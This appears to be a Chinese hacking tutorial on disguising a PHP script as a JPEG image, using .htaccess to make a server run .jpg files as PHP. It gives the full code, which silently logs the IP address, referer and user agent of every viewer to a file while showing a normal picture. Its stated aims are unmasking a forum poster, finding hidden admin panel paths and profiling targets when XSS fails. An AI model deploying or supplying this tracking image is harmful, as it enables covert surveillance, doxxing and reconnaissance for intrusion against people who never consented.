是否有时候存在以下情况:
1.感觉目标站点存在XSS,但是XSS平台就是收不到货
2.找到后台密码却寻不着后台入口
3.想查看发帖人的IP地址。
那么可以尝试VK这招。(受虾米表哥的思路启发)
不用打开链接,只要打开了含有我的图片的网页就会中招。
0x01 正文
先看看效果
1.某人发起悬赏,要社工我,设置了仅楼主可见
2.回帖:
3.楼主发现回复:
4.这边已经收到信息:
原理及教程
原理是使用.htaccess,将jpg文件当作php文件来解析。
用php伪造一个图片,而内容则是获取目标ip、referer、UA信息
1.在自己VPS的jpg目录下创建.htaccess文件。
内容是:
AddHandler application/x-httpd-php .jpg
意思就是将jpg文件当作php文件来解析。
2.建立1.jpg,代码如下:
<?php
function filter_dangerous_words($str){
$str = str_replace("'", "‘", $str);
$str = str_replace("\"", "“", $str);
$str = str_replace("<", "《", $str);
$str = str_replace(">", "》", $str);
return $str;
}
function getIP() {
if (getenv('HTTP_CLIENT_IP')) {
$ip = getenv('HTTP_CLIENT_IP');
}
elseif (getenv('HTTP_X_FORWARDED_FOR')) {
$ip = getenv('HTTP_X_FORWARDED_FOR');
}
elseif (getenv('HTTP_X_FORWARDED')) {
$ip = getenv('HTTP_X_FORWARDED');
}
elseif (getenv('HTTP_FORWARDED_FOR')) {
$ip = getenv('HTTP_FORWARDED_FOR');
}
elseif (getenv('HTTP_FORWARDED')) {
$ip = getenv('HTTP_FORWARDED');
}
else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
$ip = getIP();
@$referer = $_SERVER['HTTP_REFERER']."\r\n";
$ua = $_SERVER['HTTP_USER_AGENT']."\r\n\r\n";
date_default_timezone_set("Asia/Shanghai");
$date_ = date("Y.m.d,h:i:sa")."\r\n";
//记录后台地址等信息
$hack = 'date: '.$date_.'ip:'.$ip."\r\n".'referer: '.$referer.'ua: '.$ua;
$hack = filter_dangerous_words($hack);
$op = fopen('hack.txt','a+');
fwrite($op,$hack);
fclose($op);
//伪装成图片
$im = imagecreatefromjpeg("2.jpg");//注意该目录下,也要有2.jpg这个图片
header('Content-Type: image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>
3.随便找个图片放进该目录下,命名为2.jpg
然后,别人访问该目录下的1.jpg,看上去是张图片,
但实际上隐私信息已经被我偷偷记录
适用场景
1.前言的三点
2.获取后台路径条件比较苛刻,首先得有个上传图片,后台管理员审阅的接口,其次这个接口允许外链图片,或者可以抓包更改成外链图片(虾米表哥总结是dede和yii可以)
3.目标站点有XSS,但是由于浏览器原因,xss没有生效,平台没有收到货,可以用此法查看对方的浏览器信息。
,PHP就没有浏览器限制,可以先了解对方的浏览器信息,来具体问题具体分析
4.大家集思广益吧,能放外链图片的地方都能用得着。
0x02 相关问题解决办法
1.htaccess不生效
扫描二维码关注公众号,回复:
4089831 查看本文章
2.访问图片,依旧没有生成hack.txt